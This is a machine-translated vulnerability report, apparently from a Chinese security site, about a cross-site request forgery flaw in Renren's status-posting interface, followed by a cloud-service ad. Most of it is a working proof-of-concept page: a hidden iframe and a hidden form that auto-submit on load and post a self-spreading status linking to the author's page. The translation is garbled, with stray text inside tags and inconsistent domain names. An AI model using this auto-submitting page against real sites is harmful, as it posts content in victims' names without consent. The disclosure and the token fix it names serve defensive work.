Scripts. Http://bookman.sinaapp.com/doover.php"
Detailed description:
I checked the source code of the link and submitted it through the Renren shopping interface.
The interface address is http://j.ren.com/publisher/status. you only need to post a contentto the interface.
The post content on this page is "ended, this is my self-white XXXX ".
<Html>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> love your words </title>
</Head>
<Body>
<Iframe name = "destination" width = "0" height = "0"> </iframe>
The number bookman loves you. Welcome to the "Xiao Han Bookman" workspace.
<Div id = "kotify" style = "float: left; display: none;">
<Form id = "akiko" name = "akiko" action = "http://j.renren.com/publisher/status" method = "POST" target = "destination">
<Input type = "text" name = "synsbcp" www.2cto.com value = "1"/>
<P> raw: <input type = "text" name = "content" value = "is over. This is my self-control. If you want to understand the principle, check my log. Http://bookman.sinaapp.com/doover.php </p>
<Input type = "submit" value = "Submit"/>
</Form>
</Div>
<Script>
Document. akiko. submit ();
</Script>
</Body>
</Html>
Solution:
Everyone knows more than I do. In the past, flash was similar. It was an insite email.
It is easy to add a token to verify the vulnerability.
A low-level error, not from the Internet.
Author leo108 AND white bear
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
